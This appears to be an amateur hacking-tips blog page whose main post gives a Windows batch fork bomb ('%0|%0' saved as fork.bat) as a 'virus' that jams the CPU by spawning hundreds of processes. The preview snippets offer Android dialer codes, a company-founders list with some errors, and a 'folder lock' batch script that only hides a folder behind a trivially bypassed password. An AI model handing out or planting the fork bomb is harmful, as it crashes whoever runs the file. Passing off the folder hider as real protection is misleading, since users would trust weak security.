Skip to main content
Hiii, friends ,
    i m telling u how to create a virus .
it is very simple just open your notepad and type the given code.


%0|%0

and save it as fork.bat,

its a virus of just 5 characters On double clicking
this file,it will lead to total CPU jam by opening
about hundreds process of command prompt...


Don't self test on your computer.. B Coz am not responsible for that!!!



pls comment your respond....


thank you.....
   

                                                                     ***(! w@n@ b H@(Ker)***

Comments

Popular posts from this blog

Android Secret Codes...

Hey hi frinds...         if your using Android phone then Good news for you... I recently found new and working Android secrets code.  this code is work in all Android OS. Try to your phone and check all about your phone....   Android secret code.... 1. Phone Information, Usage and Battery – *#*#4636#*#* 2. IMEI Number – *#06# 3. Enter Service Menu On Newer Phones – *#0*# 4. Detailed Camera Information – *#*#34971539#*#* 5. Backup All Media Files – *#*#273282*255* 663282*#*#* 6. Wireless LAN Test – *#*#232339#*#* 7. Enable Test Mode for Service – *#*#197328640#*#* For more tricks like my FB   Fan page.... FB                                                                                       ...

Founders

1) Nokia: Founder - Fredrik Indestam and Leo Mechelin Headquarters - Finland. 2) Apple: Founder - Steve Jobs, Steve Wozniak and Ronald Wayne Headquarters - California U.S. 3) HTC: Founder - Cher Wang, HT Chou and Peter Chou Headquarters - Taiwan. 4) Sony: Founder - Masaru Ibuka and Akio Morita Headquarters - Minato, Tokyo, Japan. 5) Micromax: Founder - Rajesh Agarwal, Sumeet Arora, Rahul Sharma and Vikas Jain Headquarters - Gurgaon, Haryana, India. 6) LG: Founder - Koo In-Hwoi Headquarters - Seoul, South Korea. 7) Samsung: Founder - Lee Byung-Chull Headquarters - Korea. Motorola: Headquaters - Schaumburg, Illinois, United States 9) Google : The founders are Sergey Brin and Larry Page. Both are alumni of Stanford University. They were friends and Google was started as a Stanford University Project. To know better about them read the book "The Google Story".Its worth reading if you are fascinated by Google and its fascinating growth 10) Facebook :...

Folder lock without any softwere

 here is the fo ur simple step  to create your own folder locker.   (1) open your notepad and past following code in notepad.        (2) then goto line no. 23 and repl ace password with your own password as like you.   (3) save this file as lock.bat name.   (4) and open your own folder locker.     enjoy.code is given below . @ECHO OFF title Folder Private if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Private goto MDLOCKER :CONFIRM echo Are you sure you want to lock the folder(Y/N) (By hackrsahead.blogspot.com.) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to unlock folder (By hackrsahe...